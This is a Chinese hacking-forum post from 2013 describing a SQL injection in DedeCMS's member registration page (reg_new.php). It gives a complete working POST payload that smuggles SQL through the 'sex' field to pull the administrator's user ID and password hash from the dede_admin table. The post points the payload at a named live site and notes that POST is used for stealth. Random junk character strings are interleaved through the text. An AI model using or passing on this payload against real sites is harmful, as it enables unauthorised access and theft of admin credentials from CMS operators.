找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2199|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞类型: SQL注射漏洞
" N, c/ n. \% q8 g1 e; b  i简要描述:  Q$ p  Q( `) z8 Z9 D
* D- I: z6 W, D
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. B1 \" d1 }5 @; e1 E
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
. I% l+ O& C  L5 y详细说明:跟这个漏洞- v* S/ T) t/ m' Z

" s6 O# i9 @9 ?8 a2 ^/ XWooYun: Dedecms SQL注射导致审核机制绕过漏洞
1 b; F  ~- J" K  E) i是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
1 U/ i7 n+ k' R" FPOST提交以下数据,其实不用POST提交的,这样隐蔽点.' C* J: [& [. P( l6 h
+ h% b0 e$ U0 o' U. f. G8 F6 s
www.political-security.com/member/reg_new.php: G7 J  M6 K" f1 s; c

% o: U! G& b! c; a6 }1 W9 y  I, z+ [. R3 OPOST
# z6 _( _/ z, |1 y0 D, q7 ~4 v" S% r 6 W& y7 M9 O/ I7 N6 m  s( |
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&, R$ ^$ |% q. U& p
userid=c4rp3nt3r&uname=c4rp3nt3r" q6 x) f9 j7 q* U! f9 t6 |
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss. \; ^( u2 x# ]: a0 F. W
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`," ^* `8 M8 r3 V# B9 G
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
& ]; ^; g7 @/ _+ y% U# T8 |1 u%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表